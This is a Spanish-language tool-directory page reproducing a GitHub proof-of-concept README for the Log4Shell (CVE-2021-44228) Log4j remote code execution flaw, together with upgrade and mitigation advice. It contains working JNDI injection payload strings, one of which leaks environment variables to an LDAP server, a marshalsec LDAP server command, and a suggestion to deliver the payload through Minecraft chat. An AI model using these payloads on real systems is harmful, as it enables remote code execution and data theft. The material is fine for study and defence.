Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228-example — POC de vulnerabilidad | Kitploit
Herramientas/GitHubGitHub/kosmx/cve-2021-44228-example
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubkosmx/cve-2021-44228-example

CVE-2021-44228-example

POC de vulnerabilidad

Ver Repositorio
721hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Este es un ejemplo de explotación de CVE-2021-44228

Una vulnerabilidad RCE de Log4J2


No soy responsable de este código. POR FAVOR, no lo uses con fines malintencionados

CVE-2021-44228:
Esta vulnerabilidad te permite ejecutar código arbitrario registrando un mensaje malicioso en la máquina objetivo.
Por ejemplo, puedes usarlo en Minecraft enviando un mensaje de chat, y la máquina del servidor/jugador registrará el mensaje de chat y ejecutará tu código.
Vídeo de LiveOverflow sobre CVE-2021-44228

El mensaje debe contener un marcador de posición ${} con la instrucción de cargar un objeto remoto a través de la API . Cargará el objeto mediante un

Descargar herramienta
jndi
ObjectFactory
  • LDAP ldap://x.x.x.x:port/...
  • HTTP http://x.x.x.x/...
  • DNS dns://x.x.x/...
  • etc...

${jndi:ldap://127.0.0.1:1389/#}

Si el ObjectFactory no está presente en el cliente, no hará nada.
Excepto resolver el servidor.
Con eso, puedes filtrar variables de entorno:

${jndi:ldap://127.0.0.1:1389/${env:java_home}}

¿De qué va todo este revuelo sobre este RCE?

¿por qué está tan sobrevalorado?
Si mi entendimiento es correcto, proporciona una interfaz a JNDI

Qué se puede explotar

JNDI JDAP es una API de búsqueda de objetos.
Puedes obtener un objeto Java de un servidor.
marshalsec/LDAPRefServer
Envía datos del objeto y el nombre del ObjectFactory, que debería construir el objeto en el cliente.
Puede explotarse de múltiples maneras.
Si LDAP está configurado para confiar en código externo, solo necesitamos dar la URL a un ObjectFactory malicioso.
com.sun.jndi.ldap.object.trustURLCodebase = true
O existe otra vulnerabilidad de Java. JDK-8196902
Combinado con eso, realmente se convertirá en un RCE.
Múltiples repositorios POC hacen esto en GitHub. Por ejemplo tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

Si esto está configurado como false (por defecto está configurado como false), podemos buscar un ObjectFactory explotable en la base de código objetivo,
o explotar JNDI de otra manera.

Lectura adicional sobre inyección JNDI:
Inyección JNDI
Veracode Research/rogue-jndi

En el ejemplo:

RCEExample es una función que registra el mensaje malicioso.
Solo presiona ejecutar para ejecutarlo...

LoggerFactory es un ObjectFactory que registrará lo que reciba...
Si compilas marshalsec, puedes pedirle que use LoggerFactory

  1. java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1/#LoggerFactory"
  2. Ejecuta rce.RCEExample y observa el exploit (el logger).
  3. Puedes depurar este proyecto y colocar un punto de interrupción en LoggerFactory, ver los objetos.

Asegura tu programa

Tu programa no está afectado SI solo registra mensajes integrados.
Si el programa puede registrar texto de cualquier archivo de datos, o de la red, es vulnerable.
Pero deberías arreglarlo de todos modos...

Lo mejor que puedes hacer es actualizar a Log4J2 2.15.0+
Si no es posible por alguna razón, desactiva la búsqueda JNDI con el siguiente argumento de Java: ‐Dlog4j2.formatMsgNoLookups=True para mitigar la vulnerabilidad.

Si eres administrador de un servidor de Minecraft, sigue la guía oficial: MENSAJE IMPORTANTE: VULNERABILIDAD DE SEGURIDAD EN JAVA EDITION